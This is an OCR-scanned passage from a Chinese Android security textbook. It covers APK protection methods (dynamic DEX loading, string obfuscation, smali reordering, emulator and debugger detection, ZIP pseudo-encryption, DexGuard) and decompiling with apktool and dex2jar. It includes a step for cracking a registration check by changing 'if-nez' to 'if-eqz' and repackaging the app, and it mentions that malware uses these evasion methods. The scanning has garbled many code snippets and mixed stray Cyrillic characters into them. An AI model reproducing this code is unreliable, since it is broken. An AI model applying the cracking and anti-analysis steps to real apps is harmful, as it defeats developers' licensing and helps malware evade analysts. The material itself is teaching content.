try { 
Class<?> mLoadClass = 


егез 


classLoader.loadClass("com.example.dexclassloaderslave.DexSlave"); 
Constructor<?> constructor = mLoadClass.getConstructor(new Class[ ] { }); 
Object dexSlave = constructor.newInstance(new Object[ ] { }); 

Method sayHello  mLoadClass.getDeclaredMethod("sayHello", new Class[ K } ); 
sayHello.setAccessible(true); 

sayHello.invoke(dexSlave, new Objectf ]( }); 

) catch (Exception e) 


t 
e.printStackTrace(); 


H 

在 上 述 代码 中 ， 调 用 了 类 com.example.dexclassloaderslave.DexSlave 中 的 sayHello() 714: 

在 Android 开发 应 用 中 ， 对 于 需要 通过 DexClassLoader 调用 的 .apk 或 jar 文件 的 分 发 操作 来 说 ,可 以 将 
其 放 入 Android 项 目的 assets 或 者 res 目录 下 ， 也 可 以 将 其 放 在 服务 器 端 ， 在 实际 需要 调用 时 通过 网 络 获取 
文件 。 为 了 提高 被 逆向 分 析 的 难度 ， 可 以 对 被 调用 的 .apk 或 jar 文件 采取 以 下 措施 进行 保护 。 
进行 完整 性 校 验 操 作 ， 防 止 文件 被 算 改 。 
进行 加 密 处 理 操作 ， 在 调用 加 载 前 进行 解密 操作 。 
对 于 需要 调用 的 函数 的 相关 信息 使 用 通过 网 络 获取 的 方式 , 而 不 是 直接 编码 在 代码 中 , 这样 可 以 真 
正 实现 动态 调用 ， 提 高 被 静态 分 析 的 难度 。 

O 对 于 使 用 网 络 服务 器 分 发 的 方式 来 说 , 对 网 络 服务 器 地 址 进行 严格 保护 , 不 要 以 字符 串 直 接 编码 的 

方式 写 在 代码 中 ， 对 下 载 请 求 也 需要 使 用 Cookie 等 辅助 识别 的 技术 。 

除了 使 用 类 DexClassLoader 实现 动态 加 载 外 ， 还 可 以 使 用 类 dalvik.system.DexFile 实现 DEX 文件 的 加 
载 , 但 是 在 实例 化 过 程 中 , 类 DexFile 提供 的 构造 方法 需要 在 /data/davik-cache 目录 下 生成 相应 的 DEX 文件 ， 
而 /data/davik-cache 目录 对 于 一 般 应 用 程序 是 没有 写 权限 的 ， 所 以 在 程序 中 无 法 实例 化 DexFile 对 象 ， 也 就 
无 法 调用 DexFile.loadClass() 方 法 。 所 以 需要 通过 反射 调用 DexFile 类 的 openDex() 方 法 。 


ooo 
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在 Android 应 用 程序 开发 过 程 中 难免 会 使 用 到 字符 串 ， 例 如 ， 服 务 器 的 地 址 等 一 些 敏感 信息 。 如 果 使 
用 硬 编码 的 方式 处 理 这 些 字符 串 ， 就 会 很 容易 地 通过 静态 分 析 获 取 到 ， 甚 至 可 以 使 用 自动 化 分 析 工 具 批量 
提取 。 例 如 ， 在 Java 源 代 码 中 定义 一 个 如 下 字符 串 。 

String str = "| am a string!"; 

则 在 反 编译 的 .smali 代码 中 对 应 的 代码 如 下 所 示 。 

const-string vO, "| am a string!" 

对 于 自动 化 分 析 工 具 来 说 ， 因 为 只 需要 扫描 到 关键 字 const-string 即 可 提取 到 字符 串 值 ， 所 以 应 该 尽量 
避免 在 源 代 码 中 定义 字符 串 常量 。 此 时 比较 简单 的 解决 方法 是 ， 使 用 类 StringBuilder 通过 аррепа() 2712: 
造 需 要 的 字符 串 ,或 使 用 数组 的 方式 来 存储 字符 串 。 例如， 使 用 StringBuilder 构造 字符 串 反 编译 后 的 代码 如 
下 所 示 。 

line 26 

„local v10, strBuilder:Ljava/lang/StringBuilder; 

const-string v11, "I" 

invoke-virtual (v10, v11), 

Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 


@ 
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const-string v11, "am" 

invoke-virtual (v10, v11}, 

Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 

Ліпе 28 

const-string v11, "a" 

invoke-virtual {v10, v11}, 

Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 

line 29 

const-string v11, "String" 

invoke-virtual (v10, v11}, 

Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; 

line 30 

invoke-virtual {v10}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String; 

在 上 述 方式 中 可 以 增加 自动 化 分 析 的 难度 ， 此 时 如 果 想 完整 地 提取 一 个 字符 串 ， 只 是 用 静态 分 析 方 法 
就 必须 要 进行 相应 的 词法 分 析 和 语法 解析 工作 。 另 外 ， 也 可 以 对 字符 串 进行 加 密 处 理 操作 。 在 现实 中 很 多 
恶意 代码 就 采用 了 这 种 方法 ， 例 如 ， 一 些 具 有 BOT 功能 的 恶意 代码 会 加 密 处 理 C&C 服务 器 地 址 和 命令 ， 
在 运行 时 再 进行 解密 。 


11.6 ”代码 乱 序 操作 
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在 Android 应 用 程序 开发 过 程 中 ， 为 了 增加 被 逆向 分 析 的 难度 ， 可 以 将 原 有 代码 在 smali 格式 上 进行 乱 
序 处 理 ， 但 是 需要 保证 不 会 影响 程序 的 正常 运行 。 代 码 乱 序 操作 的 基本 原理 如 图 11-4 所 示 。 


指令 2 


正常 指令 序列 乱 序 后 指令 序列 
图 114 乱 序 操作 的 原理 


在 图 11-4 所 示 的 操作 中 ， 将 指令 重新 布局 后 需要 给 每 块 指令 赋予 一 个 label， 在 函数 开头 处 使 用 goto 
命令 跳 到 原先 的 第 一 条 指令 处 ， 然 后 在 处 理 完 第 一 条 指令 后 再 跳 到 第 二 条 指令 处 ， 以 此 类 推 。 

例如 ， 下 面 是 一 段 实现 两 个 整数 相 加 功能 的 Java 代码 。 

public void test()( 

int a = 1; 

int b = 2; 

intc=a +b; 

System.out.printin(c); 

} 
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对 上 述 代 码 进行 反 编译 操作 ， 得 到 如 下 所 示 的 smali 代码 。 

.method public test()V 

locals 4 

.prologue 

ine 24 

const/4 vO, 0x1 

Jine 25 

local vO, a:l 

const/4 v1, 0x2 

Jine 26 

local v1, b:l 

add-int v2, vO, v1 

ine 27 

local v2, c:l 

sget-object v3, Ljava/lang/System;-»out:Ljava/io/PrintStream; 

invoke-virtual (v3, v2}, Ljava/io/PrintStream;-»println(I)V 

Jine 28 

return-void 

为 了 提高 被 反 编 译 的 难度 ， 此 时 可 以 对 上 述 提 到 的 代码 进行 乱 序 处 理 ， 删 除了 .line 部 分 ， 将 函数 test() 
乱 序 处 理 成 如 下 所 示 代 码 。 

.method public test()V 

‘locals 4 

„local v2, c:l 

goto :lab1 

‘lab3 

sget-object v3, Ljava/lang/System;->out:Ljava/io/PrintStream; 

invoke-virtual (v3, v2), Ljava/io/PrintStream;->println(I)V 

goto :end 

local v1, b:l 

:lab2 

add-int v2, v0, v1 

goto :lab3 

„local vO, a:l 

:lab1 

const/4 v0, 0x1 

const/4 v1, 0x2 

goto :lab2 

:end 

return-void 

.end method 

接 下 来 即 可 使 用 apktool 工具 重新 打包 并 发 布 ， 这 样 经 过 代码 乱 序 操作 后 ， 可 以 在 一 定 程度 上 增加 被 逆 
向 分 析 的 难度 。 例 如 ， 使 用 dex2jartjd-GUI 工具 来 分 析 上 述 演 示 代 码 ， 其 中 乱 序 前 的 代码 如 图 11-5 所 示 。 

public void test() 
‘ int i = 1 + 2; 
System.out.println(i); 


) 
图 11-5 乱 序 前 的 代码 
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乱 序 处 理 后 的 代码 如 图 11-6 所 示 。 


public void resc() 
Ü 
break label20; 
int i; 
System.out.println(i); 
return; 
1label20: 
while (true) 
И 
ї=1+2; 
break; 
} 
} 


图 11-6 乱 序 处 理 后 的 代码 
通过 比较 乱 序 前 和 乱 序 后 的 代码 可 知 ， 使 用 代码 乱 序 技术 能 够 在 一 定 程度 上 增加 逆向 分 析 的 难度 。 


11.7 模拟 器 检测 
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在 分 析 APK 的 过 程 中 通常 会 借助 于 Android 模拟 器 的 帮助 , 例如 , 分 析 网 络 行为 和 动态 调试 等 从 APK 
自我 保护 的 角度 出 发 ， 可 以 增加 对 APK 当前 运行 环境 的 检测 ， 判 断 是 否 运行 在 模拟 器 中 ， 如 果 运 行 在 模拟 
器 中 可 以 选择 退出 整个 应 用 程序 的 执行 或 者 跳 到 其 他 分 支 。 在 现实 应 用 中 ， 有 多 种 检测 模拟 器 检测 的 方法 ， 
具体 说 明 如 下 所 示 。 

1. 属性 检测 


Android 属性 系统 类 似 于 Windows 的 注册 表 机 制 ， 所 有 的 进程 可 以 共享 系统 设置 值 。 一 些 属性 值 在 
Android 模拟 器 和 真 机 上 是 不 同 的 , 例如 , 对 于 Nexus4 和 Android SDK 4.1.2 的 模拟 器 来 说 , Build.BRAND 
和 Build.DEVICE 属性 值 分 别 如 图 11-7 和 图 11-8 所 示 。 根据 这 些 属性 值 , 可 以 很 容易 地 查看 在 真实 机 器 和 
模拟 器 上 的 差别 。 


System.out google System.out generic 
System.out mako System.out generic 
图 11-7 Nexus4 的 属性 值 图 11-8 Android SDK 的 属性 值 


系统 会 检测 Android 应 用 程序 是 否 在 模拟 器 中 运行 ， 但 是 可 以 比较 容易 地 绕 过 这 种 检测 方式 ， 主 要 有 
如 下 3 种 绕 过 方式 。 

口 在 源码 中 修改 相应 的 属性 值 ， 重 新 编译 生成 内 核 等 镜像 文件 ， 再 使 用 这 些 重 新 生成 的 镜像 文件 加 载 模 

拟 器 (对 于 BRAND 属 性 值 可 以 修改 /build/target/product/generic.mk 文 件 中 的 PRODUCT_BRAND 值 〉。 

口 修改 boot.img 文件 。 

О 使 用 Xposed 框架 在 函数 before() 中 检查 需要 获取 的 属性 ， 根 据 情况 修改 对 应 的 值 ， 然 后 返回 。 

另外 ， 还 可 以 通过 检测 IMEI、IMSI 等 值 来 判断 是 否 是 模拟 器 。 在 模拟 器 中 ， 这 两 个 值 的 默认 值 分 别 是 
000000000000000 和 310260000000000。 例 如 ， 通 过 以 下 代码 可 以 获取 IMSI {Н 

TelephonyManager manager = (TelephonyManager)getSystemService(TELEPHONY SERVICE); 

String imsi = manager.getSubscriberld(); 

TELEPHONY SERVICE 需要 申请 android.permission.READ PHONE STATE 权限 ， 同 样 也 有 相应 的 
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绕 过 方式 ， 其 中 一 个 相对 简单 的 方法 是 直接 修改 Android SDK F/tools/emulator-arm.exe 文件 (Windows 版 本 ) 。 
使 用 010Editor 打开 emulator-arm.exe 文件 ， 搜 索 CIMI， 如 图 11-9 所 示 。 

CIML 后 面 的 15 位 数字 值 是 IMSI，CGSN. 后 面 的 15 位 数字 为 IMEI， 修 改 这 两 个 值 (确保 没 有 运行 模 
拟 器 ) ， 然 后 保存 。 


; 3D 00 28 43 48 ас 44 30 30 00 25 43 42 4C 44 зр =. сица, сне 
i 3» бо 25 4з 4 4c ii зо 32 00 25 їз EST 

33 00 a2 00 42 00 21 28 se si з зир CENSUI D 
4D 49 оо фз 31 зо 32 36 зо зо зо зо 30730 30 S8 .| 
зо зо co va 3242853238 00 31 32 33 34 31 зә ээ 

34 31 32 33 34 31 32 33 00 25 43 55 op SEE 
00 28 яз ar so 5з зр зо 00 21 28 43 «hg sog Jf 


2 00 21 2B 43 50 49 4E Зр 00 2B 43 50 49 


图 11-9 修改 IMSI 和 IMEI 
修改 后 再 运行 模拟 器 ， 此 时 查看 IMSI 的 值 ， 如 图 11-10 所 示 。IMEI 值 如 图 11-11 所 示 。 


4 
Status 


Mobile network state 
Disconnected 


My phone number 
1-555-521-5554 


IMEI 
123412341234123 
IMEI SV 
System.out a192461924619%4 Unknown 
图 11-10 修改 后 的 IMSI 值 图 11-11 修改 后 的 IMEI 值 


由 此 可 见 ， 可 以 成 功 修改 这 两 个 值 。 
2. 虚拟 机 文件 检测 


相对 于 真实 设备 ， 在 Android 模拟 器 中 存在 了 一 些 特殊 的 文件 或 目录 ， 例 如 ， 可 执行 文件 /system/bin/ 
qemu-props 可 以 用 来 在 模拟 器 中 设置 系统 属性 。 另 外 还 有 文件 /systenylibylibc_malloc_debug_qemu.so 和 
/sys/qemu trace 目录 。 可 以 通过 检测 这 些 特 殊 文件 或 者 目录 是 否 存在 来 判断 Android 应 用 程序 是 否 运行 在 模 
拟 器 中 ， 核 心 代码 如 下 所 示 。 

private static String[ ] known files = ( 

"/system/lib/libc malloc debug qemu.so", 

"/ѕуѕ/дети trace", 

"/system/bin/qemu-props" 

y 

public static boolean hasQEmuFiles() { 

for(String pipe : known files) { 

File qemu file = new File(pipe); 

if (qemu file.exists()) 

return true; 

} 

return false; 


} 


(m, 
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注意 : 更 加 完整 的 演示 代码 可 以 参考 大 师 Tim Strazzere 的 Github 中 的 项 目 anti-emulator， 在 该 项 目 中 还 
列举 了 其 他 一 些 模 拟 器 检测 的 方法 ， 例 如 检测 socket 文 件 /dec/socketqemud。 


11.8 АРК 4470 
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АРК 文件 实际 上 是 ZIP 格式 的 压缩 文件 , 但 是 Android 系统 在 解析 АРК 文件 时 ， 和 传统 解压 缩 软件 解 
Ër ZIP 文件 有 所 差异 , 利用 这 种 差异 可 以 实现 给 APK 文件 实现 加 密 的 功能 。 在 Central Directory 部 分 的 File 
Header 头 文件 中 ， 有 一 个 2 字 节 长 的 名 为 General purpose bit flags 的 字段 ,在 这 个 字段 中 ， 如 果 第 0 位置 是 
1， 则 表示 ZIP 文件 的 该 Central Directory 是 加 密 的 ， 如 果 使 用 传统 的 解压 缩 软件 打开 这 个 ZIP 文件 ， 在 解 
压 该 部 分 Central Directory 文件 时 , 是 需要 输入 密码 的 ， 如 


图 11-12 所 示 。 Bazs 
但 是 Android 系统 在 解析 ZIP 文件 时 并 没有 使 用 这 一 NUM 
位 ， 也 就 是 说 在 Android 系统 中 运行 APK 文件 时 ， 这 一 | 
位 是 否 置 位 并 没有 任何 影响 。 通 常 在 逆向 分 析 APK 文件 zs 
时 ,会 首先 使 用 第 三 方 工具 apktool 来 解析 资源 文件 , 完成 BN RUM 


DEX 文件 的 反 汇 编 工 作 。 如 果 将 ZIP 文件 中 Central ce 
Directory 的 General purpose bit flags 第 0 位 设置 为 1， 图 11-12 传统 解压 缩 软件 需要 输入 密码 进行 解压 缩 


apktool(version:1.5.2) 将 无 法 完成 正常 的 解析 工作 ， 如 图 11-13 所 示 。 但 是 这 样 不 会 影响 在 Android 系统 上 正 
常 运行 APK 文件 。 


图 11-13 4H apktool 解析 伪 加 密 的 АРК 文件 失败 


在 对 APK 文件 进行 伪 加 密 时 可 以 使 用 上 述 脚本 ， 在 Python 的 zipfile 模块 中 ， 在 ZipInfo 类 中 记录 了 
ZIP 文件 中 相应 的 Central Directory 的 相关 信息 ， 包 括 General purpose bit fags。 在 类 ZipInfo 中 属性 为 
flag_bits， 因 此 上 述 脚 本 中 将 需 加 密 的 APK 文件 的 每 个 ZipInfo 的 flag bits 和 1 进行 或 操作 ， 在 General 
purpose bit flags 的 第 0 位 设置 为 1。 而 如 果 需 要 去 除 这 些 伪 加 密 的 标志 ,也 可 以 使 用 这 个 脚本 。 脚 本 代码 保 
存在 https://github.com/blueboxsecurity/DalvikBytecodeTampering/blob/master/unpack.py 中 ， 具 体 代码 如 下 所 示 。 

import argparse 

from zipfile import ZipFile, Ziplnfo 


® 
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class ApkFile(ZipFile): 

def extract(self, member, path=None, pwd=None): 
if not isinstance(member, ZipInfo): 

member - self.getinfo(member) 

member.flag bits “= member.flag_bits%2 
ZipFile.extract(self, member, path, pwd) 

print 'extracting %s' % member.filename 


def extractall(self, path=None, members=None, pwd=None): 
map(lambda entry: self.extract(entry, path, pwd), members if members is not None and len(members)>0 else 


self.filelist) 

if name --' main * 

parser = argparse.ArgumentParser(description='unpacks ап APK that contains files which are wrongly marked 
as encrypted") 


parser.add argument('apk', type-str) 
parser.add argument('file', type=str, nargs='*') 
args 7 parser.parse args() 


apk = ApkFile(args.apk,'r') 
apk.extractall(members=args. file) 


Status 
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在 对 APK 逆向 分 析 时 ， 通 常会 采取 动态 调试 技术 ， 使 用 netbeanstapktool 对 反 汇编 生成 的 smali 代 
码 进行 动态 调试 。 为 了 防止 APK 文件 被 动态 调试 ， 可 以 检测 是 否 有 调试 器 连接 。Android 系统 在 类 
android.os.Debug 中 提供 了 方法 isDebuggerConnected()， 功 能 是 检测 是 否 有 调试 器 连接 。 可 以 在 Application 
类 中 调用 isDebuggerConnected() 方 法 ， 判 断 是 否 有 调试 器 连接 ， 如 果 有 则 直接 退出 程序 。 

除了 使 用 isDebuggerConnected() 方 法 外 ， 还 可 以 通过 在 文件 AndroidManifest 的 application 节点 中 加 入 
android:debuggable="alse" 语 句 使 得 程序 不 可 被 调试 。 此 时 如 果 和 希望 调试 代码 ， 则 需要 修改 该 值 为 true。 可 以 
在 代码 中 检查 这 个 属性 的 值 来 判断 程序 是 否 被 修改 过 ， 有 具体 代码 如 下 所 示 。 

if(getApplicationInfo().flags &= ApplicationInfo.FLAG DEBUGGABLE !- 0){ 

System.out.printIn("Debug"); 


@ 


sue лова ннн 


android.os.Process.killProcess(android.os.Process.myPid()); 


} 
1110 KBR A 
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因为 使 用 Java 编写 的 代码 很 容易 被 反 编译 ， 此 时 也 可 以 使 用 代码 混淆 的 方法 来 增加 被 反 编 译 的 难度 。 
ProGuard 是 一 款 免费 的 Java 代码 混淆 工具 ， 提 供 了 文件 压缩 、 优 化 、 混 淆 和 审核 功能 。 在 Android 系统 
的 Eclipse-ADT 开发 环境 下 ， 每 个 Android 应 用 程序 项 目 目录 下 会 默认 生成 projectproperties 和 
proguard-project.txt 文件 。 如 果 需 要 使 用 ProGuard 进行 压缩 以 及 混淆 ， 首 先 需要 在 文件 project.properties 
中 去 掉 如 下 语句 中 的 注释 符号 “#”， 然 后 生成 包 即 可 实现 混淆 。 

proguard.config=$(sdk.dir)/tools/proguard/proguard-android.txt:proguard-project.txt 

需要 在 文件 proguard-project.txt 中 声明 保留 的 类 或 方法 , 这 是 因为 在 某 些 情况 下 , ProGuard 会 错误 地 认 
为 没有 使 用 某 些 代码 ， 例 如 ， 只 在 文件 AndroidManifest 中 引用 的 类 ， 从 JNI 中 调用 的 方法 等 。 对 于 这 些 情 
况 ， 需 要 在 文件 proguard-project.txt 中 添加 -keep 命令 以 保留 类 或 方法 。 

除了 可 以 使 用 ProGuard 工具 对 Android 代码 进行 混淆 处 理 外 , 还 可 以 使 用 DexGuard。DexGuard 是 特 
别针 对 Android 的 一 款 代码 优化 混淆 的 收费 软件 ， 提 供 代码 优化 混淆 、 字 符 串 加 密 、 类 加 密 、Assets 资源 
加 密 、 隐 藏 对 敏感 API 的 调用 、 算 改 检测 以 及 移 除 Log 代码 。 


11.10.1 字符 串 加 密 


经 过 DexGuard 加 固 过 的 APK， 对 字符 串 的 访问 会 通过 调用 一 个 解密 函数 来 完成 加 密 字符 串 的 解密 ， 
如 图 11-14 所 示 。 
DE 


File Edit Action Window Help 
SHU +B CvVdrOuxKnce 2. х А Е 
манна Resources [Assets Assembly | DecompiledJava Ti^ Stings [Consants |Notes | 


public class MainActivity extends Activity ( 
private static final byte[] ##: 


statie ( 
Маісдстічісу. Š = new byte[]iOriC, OxE, 2, 9, -7, 0x10, -54, Ox3E, Ox17, -9, -44, OxiC, OxA| c 


^ Encrypted strings for MainActivity dass 
public MainAccivicy() ( 
supert): 


Create (Bondie argS) ( 
his) .onCreate (arcs): 


чеш 
Tam. 


图 11-14. DexGuard 字符 串 加 密 


框 中 的 字 节 数组 是 加 密 后 的 字符 串 ， 在 函数 onCreate() 中 调用 了 解密 函数 进行 解密 。 字 符 解 密 函数 
如 图 11-15 所 示 ， 对 其 进行 处 理 后 如 图 11-16 所 示 。 

加 密 算 法 也 很 简单 ， 基 本 思路 如 下 所 示 。 

口 当前 字符 由 前 一 个 字符 加 上 加 密 字符 数组 中 的 字符 再 减 去 常量 8。 

口 “ 当 字符 长 度 达到 给 定 的 长 度 时 ， 会 最 终 构 成 字符 串 并 返回 。 
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4 byte[] ? Ж 
> 


10095 = 0) € 
int v2 ~ argé: 
int v3 = args; 


Resources [Assets Assembly 


else ( 


= (byte)arg7)7 


ifivé >= arg6) t 
return new String(vl, б); 


П 
else d 

v2 = argi; 

byte và 1 = vS{erg8]+ 


1 
tsarot; 


goto label 11; 


图 11-15 字符 串 解密 函数 


11.10.2 assets ШЖ 


Decompiled Java 27 


Encrypted strings array 


g iint azg6, int arg7, int а: 


анла 


a) Manifest 


Cv4»OO6xNcX 
Resources 


Амен — [Assembly Strings 


decrypt(int length, int curChar, int pos) ( 


[Decompiled Java 2 Constante 


crypteastrings: 


rings [pos]; 


= curcnar_ + encci 


图 11-16 处理 后 的 解密 函数 


在 APK 文件 的 assets 目录 下 包含 了 应 用 程序 需要 使 用 到 的 资源 文件 ，DexGuard 提供 了 对 assets 资源 


文件 的 加 密 功 能 。 对 于 一 个 经 过 保护 的 asset 5 资源 文件 来 说 , 例如 ， 名 为 1.png 的 文件 ， 使 用 十 六 i 


器 查看 该 文件 ， 如 图 11-17 所 示 。 


制 查看 


ИИИИИИИЙ 
00000010: 
аййййй2й: 


виииивоа: 
00000060 
aaaaaa7a 
969088838 


enp тару p 
И RH-6H8 1C УЙ RE-46 SE AC 
9D C8-34 37 DF 

9-2F C2 


1 
10 92 E9-84 
9A 1Е-С1 


从 图 11-17 中 可 以 看 出 ， 加 密 后 的 PNG 文件 缺失 了 相应 的 文件 头 。 解 密 则 是 首先 通过 反射 调用 
AssetManager.open(0) 函 数 ， 同 时 在 对 该 函数 的 反射 调用 中 又 使 用 了 加 密 处 理 操作 , 最 后 通过 类 Cipher 完成 对 
PNG 文件 的 解密 操作 。 上 述 过 程 中 的 解密 处 理 如 图 11-18 所 示 。 

m. — L 


Ele Edt Action Window Hep 
шу ^® CvdrP COxnce 
4 [Manifest Assets Assembly 


Resources 


private int foot) í 
= asanan = this 


return new 


Decompiled lava £ 


‘Stings Constants | Notes 


зї, -27, биза); 1.png 


ng (0x11, 0, 0x13)); 
m open 


90, 0x14, Dx2E 
я -87, 0x62, -45 
0x73, Ox6E, 0x73, -1 


Jatream), cipher).available(); 


图 11-18 asset 5 解密 处 理 
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在 学 习 Android 应 用 开发 的 过 程 中 ， 需 要 经 常 借鉴 或 使 用 到 他 人 的 APK 文件 ， 以 便 了 解 这 个 APK 文 
件 的 具体 实现 代码 。 这 时 ， 就 需要 使 用 反 编译 软件 来 处 理 APK 文件 ， 以 得 到 这 个 APK 文件 的 Java 实现 代 
码 。 本 章 将 详细 讲解 常用 的 反 编 译 Android 文件 的 工具 和 Smali 语法 的 基本 知识 ， 为 读者 学 习 本 书后 面 的 知 
识 打下 基础 。 


12.1 反 编 译 基础 


E 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 12 章 \ 反 编译 基础 .avi 
在 讲解 具体 的 反 编译 Android 文件 之 前 , 首先 讲解 常用 的 反 编译 方法 等 基础 知识 , 为 读者 学 习 本 书后 面 
的 知识 打下 基础 。 


12.1.1 使 用 dex2jar 和 jdgui.exe 进行 反 编译 
本 节 将 详细 讲解 使 用 dex2jar 和 jdgui.exe 进行 反 编译 APK 文件 的 具体 过 程 。 


CD 下 载 需要 的 反 编译 工具 dex2jar 和 jdgui.exe， 读 者 可 以 从 网 络 中 下 载 获取 ， 获 取 后 的 保存 目录 
如 图 12-1 所 示 。 


8 езеж | iat 
Ё Androidfby 2013/3/6 8:49 文件 夹 
Ji apktool 2013/4/16 16:49 XAR 
Ji dex2jar 2013/4/18 16:57 XR 
= 到 


图 12-1 反 编 译 工具 


(2) 打开 Androidfby 目录 中 的 Android 反 编译 工具 “Android 反 编译 工具 .exe”， 双 击 打开 后 开始 进行 
反 编 译 工 作 。 选 中 反 编 译 的 APK 文件 ， 然 后 单 击 “ 反 编译 ”按钮 ， 如 图 12-2 所 示 。 


a 
эй 
m Ur F Miser sVapple Desktop S first apk »- 
кз | x | > | 
THEE 


12-2 开始 反 编译 
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注意 : 通过 反 编 译 工 具 可 以 得 到 软件 中 图 片 、XML 文 件 和 DEX 文 件 的 内 容 。 如 果 使 用 直接 用 解压 APK 
文件 的 方式 ， 不 能 保证 XML 文件 的 正常 显示 ， 所 以 建议 读者 联合 使 用 解压 方式 和 第 三 方 工具 的 
方式 进行 反 编 译 。 
(3) 打开 反 编译 之 后 的 文件 夹 ， 编 译 后 的 文件 目录 被 默认 保存 在 Androidfby 下 的 根 目录 中 ， 打 开 后 的 
效果 如 图 12-3 所 示 。 


+ 人民 邮电 + 2014 - Androidéír£ ~ tools + Androidfby < first + 


IR 03 
名 称 ~ 修改 日 其 类 型 大 小 
res 2014/2/21 9:50 Xf 
@ Androidlanifest.xal 2014/2/21 9:50 хи. 文档 1 
12 apktool. ml 2014/2/21 9:50 mL 文件 1m 
lasses. dex 2014/2/21 9:50 — DEX 文件 зю 


图 12-35 反 编 译 后 的 first 目录 


(4) 将 文件 classes.dex 复制 到 dex2jar 的 文件 夹 目 录 下 ， 即 需要 与 文件 dex2jar.bat 在 同一 目录 下 。 然 后 
打开 命令 提示 符 ， 一 直 打 开 到 dex2jar 目录 ， 执 行 如 下 命令 (注意 中 间 有 空格 )， 如 图 12-4 所 示 。 
dex2jar.bat classes.dex 


图 12-4 反 编译 命令 


(5) 此 时 会 在 dex2jar 目录 下 生成 一 个 名 为 classes_dex2jar.jar 的 文件 ， 接 下 来 运行 jd-gui 目录 下 的 
jd-gui.exe， 然 后 依次 选择 File | Openfil | classes_dex2jar jar 命令 后 即 可 查看 Java 代码 ， 如 图 12-5 所 示 。 


package first.a; 

import android.app.Activity; 
import android.os.Bundle; 
import android.widget.TextView; 


public oan first extends Activity t 
d when the activity is first created. * 
ёо ег ide 
public void onCreate(Bundle savedInstanceState) ( 
super.onCreate(savedInstanceState); 
setContentView(R. layout.main) ; 
Textview tv = eu Textview(this)3 
tv.setText(" eset 
setcontentView(tv)3 


} T 
图 12-5 生成 的 classes_dex2jarjar 文件 
注意 : 在 谷歌 官网 中 会 更 新 dex2jar 工 具 ， 读 者 只 需 到 http://code.google.com/p/dex2jar/downloads/list 网 址 
下 载 即 可 。 新 版 本 的 反 编译 的 功能 更 强 ， 并 且 反 编译 效果 也 更 好 。 
在 使 用 上 述 步 又 进行 反 编译 工作 时 ， 可 能 仅仅 对 没有 签名 的 АРК 文件 有 效 ， 而 对 有 签名 的 APK 文件 
无 效 。 此 时 可 以 尝试 另外 一 种 反 编译 方法 ， 具 体 流程 如 下 所 示 。 
(1) 打开 apktool 目录 ， 在 命令 行 下 定位 到 apktool.bat 文件 夹 ， 然 后 输入 如 下 所 示 的 命令 ， 如 图 12-6 
apktool.bat d -f abc123.apk abc123 


e 
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在 上 述 指令 中 ，abc123.apk 是 预 反 编译 的 АРК 文件 ，abc123 表示 设置 的 输出 文件 夹 。 


图 12-6 Б 


(2) 也 可 以 将 反 编译 文件 重新 打包 成 APK 文件 ， 方 法 是 输入 如 下 id 命令 ， 如 图 12-7 所 示 。 
apktool.bat b abc123 
[F : \Pro-f iles workspace \dex2 java\apktooli.4.1>apktool.bat b c:\Hellofndroid 


I: Checking whether sources has changed... 
maling... 


hecking whether resources has changed... 
iilding resources... 
uilding apk file... 


图 12-7 重新 编译 为 APK 文件 


G) 通过 上 述 命令 处 理 后 ， 打 包 APK 后 的 文件 被 保存 在 C:\HelloAndroid 目录 下 ， 在 其 中 生成 了 两 个 
文件 夹 : build 和 dist。 其 中 ， 打 包 生 成 的 APK 文件 是 HelloAndroid.apk， 被 保存 在 dist 文件 夹 下 。 


12.1.2 ”使 用 Smali 指令 进行 反 编 译 


反 编 译 APK 文件 成 功 后 , 会 在 当前 的 outdir 目录 下 生成 一 系列 目录 与 文件 。 对 于 一 般 的 Android 程序 来 
说 ， 错 误 提示 信息 通常 是 指引 关键 代码 的 风向 标 ， 在 错误 提示 附近 一 般 是 程序 的 核心 验证 代码 ， 分 析 人 员 需 
要 阅读 这 些 代码 来 理解 软件 的 注册 流程 。 当 APK 文件 在 打包 时 ，strings.xml 文件 中 的 字符 串 被 加 密 存储 为 
resources.arsc 文件 , 并 保存 到 APK 程序 包 中 , АРК 被 成 功 反 编译 后 这 个 文件 也 被 解密 出 来 了 。 当 通过 apktool 
БМ APK 文件 后 ， 会 生成 一 个 名 为 smali 的 文件 夹 ， 如 图 12-8 所 示 ， 里 面 都 是 以 .smali 结尾 的 文件 。 


C кз CJ m = ad 
apktool. yal < Androi dlani fest. xnl 
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YNL 文件 == | m 文档 


图 12-8 反 编译 后 的 文件 


在 获取 的 Smali 文件 中 ，“ 认 nez vO, :cond_0” 是 整个 程序 的 破解 重点 。 通 过 本 书 前 面 内 容 的 学 习 可 知 ， 
if-nez 是 Dalvik VM 指令 集中 的 一 个 条 件 跳 转 指令 ， 与 if-nez 指令 功能 相反 的 指令 为 让 eqz， 表 示 比 较 结果 
为 0 或 相等 时 进行 跳 转 。 与 if-nez 类 似 的 指令 还 有 if-eqz. if-gez 和 if-lez 等 。 可 以 用 记事 本 之 类 的 文本 编 
辑 器 打开 .smali 格式 文件 ， 将 里 面 的 代码 “if-nez v0, :cond_0” 修 改 为 “if-eqz v0, :cond_0” 并 保存 ， 这 样 整 
个 破解 代码 工作 就 算 完成 了 。 

当 修 改 完 Smali 文件 的 代码 后 , 接 下 来 就 可 以 将 修改 后 的 文件 重新 编译 并 打包 成 APK 文件 ,编译 АРК 
文件 的 命令 格式 为 : 

apktool b[uild] [OPTS] [<app_path>] [«out file»] 

因为 现在 编译 生成 的 .apk 格式 还 没有 签名 ， 所 以 不 能 进行 安装 并 测试 ， 接 下 来 需要 使 用 signapkjar T 
具 对 АРК 文件 进行 签名 。signapk.jar 工具 是 Android 源码 包 中 内 置 的 一 个 签名 工具 ， 其 代码 在 Android ji 


359 


1 Android Z 2 o I i scit 


3 A ak F H/build/tools/signapk/SignApk.java 文件 中 实现 , 源码 编译 后 可 以 在 /out/host/linux- x86/framework Н 
录 中 找到 。 使 用 signapkjar 签名 时 需要 提供 签名 文件 ， 此 处 可 以 使 用 Android 源码 中 提供 的 签名 文件 
